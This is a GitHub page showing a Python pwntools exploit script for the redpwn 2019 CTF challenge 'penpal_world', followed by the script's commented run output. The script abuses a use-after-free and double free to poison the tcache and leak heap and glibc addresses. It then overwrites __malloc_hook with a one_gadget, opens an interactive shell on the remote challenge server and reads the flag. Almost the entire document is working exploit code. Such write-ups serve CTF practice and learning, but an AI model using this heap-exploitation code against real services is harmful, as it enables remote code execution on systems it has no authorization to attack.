-
Notifications
You must be signed in to change notification settings - Fork 11
/
Copy pathexploit.py
97 lines (80 loc) · 2.46 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
#!/usr/bin/python
from pwn import *
context.terminal = ['tmux', 'sp', '-h']
# context.log_level = 'DEBUG'
elf = ELF('./penpal_world')
libc = ELF('./libc-2.27.so', checksec = False)
local = False
if local == True:
ld = ELF('/lib/x86_64-linux-gnu/ld-2.27.so', checksec = False)
io = process([ld.path, elf.path], env = {"LD_PRELOAD": libc.path})
else:
io = remote("chall2.2019.redpwn.net", 4010)
def add_postcard(idx):
io.recvuntil('4) Read a postcard\n')
io.sendline('1')
io.recvuntil('Which envelope #?\n')
io.sendline(str(idx))
def edit_postcard(idx, content):
io.recvuntil('4) Read a postcard\n')
io.sendline('2')
io.recvuntil('Which envelope #?\n')
io.sendline(str(idx))
io.recvuntil('Write.\n')
io.send(content)
def free_postcard(idx):
io.recvuntil('4) Read a postcard\n')
io.sendline('3')
io.recvuntil('Which envelope #?\n')
io.sendline(str(idx))
def show_postcard(idx):
io.recvuntil('4) Read a postcard\n')
io.sendline('4')
io.recvuntil('Which envelope #?\n')
io.sendline(str(idx))
add_postcard(0)
add_postcard(1)
free_postcard(0)
free_postcard(1)
show_postcard(1)
chunk = u64(io.recvuntil('\n', drop = True).ljust(8, '\x00')) - 0x10
log.success('Leaked second chunk address: ' + hex(chunk))
edit_postcard(1, p64(chunk - 0x250 + 0x10))
add_postcard(1)
add_postcard(0)
free_postcard(1)
log.progress('Filling TCACHE bin...')
for i in range(7):
free_postcard(0)
free_postcard(0)
show_postcard(0)
leak_arena = u64(io.recvuntil('\n', drop = True).ljust(8, '\x00'))
libc.address = leak_arena - 0x3ebca0
log.success('Leaked main_arena+96 address: ' + hex(leak_arena))
log.info('GLIBC base address: ' + hex(libc.address))
log.info('__malloc_hook address: ' + hex(libc.sym["__malloc_hook"]))
edit_postcard(1, p64(libc.sym["__malloc_hook"]))
add_postcard(1)
add_postcard(1)
edit_postcard(1, p64(libc.address + 0x10a38c))
add_postcard(1)
io.interactive()
io.close()
'''
xxx@xxx:/xxx/penpal$ python xpl.py
[*] 'xxx/penpal_world'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Opening connection to chall.2019.redpwn.net on port 4010: Done
[+] Leaked second chunk address: 0x55c275124250
[-] Filling TCACHE bin...
[+] Leaked main_arena+96 address: 0x7f12669b0ca0
[*] GLIBC base address: 0x7f12665c5000
[*] __malloc_hook address: 0x7f12669b0c30
[*] Switching to interactive mode
$ cat flag.txt
flag{0h_n0e5_sW1p3r_d1D_5w!peEEeE}
'''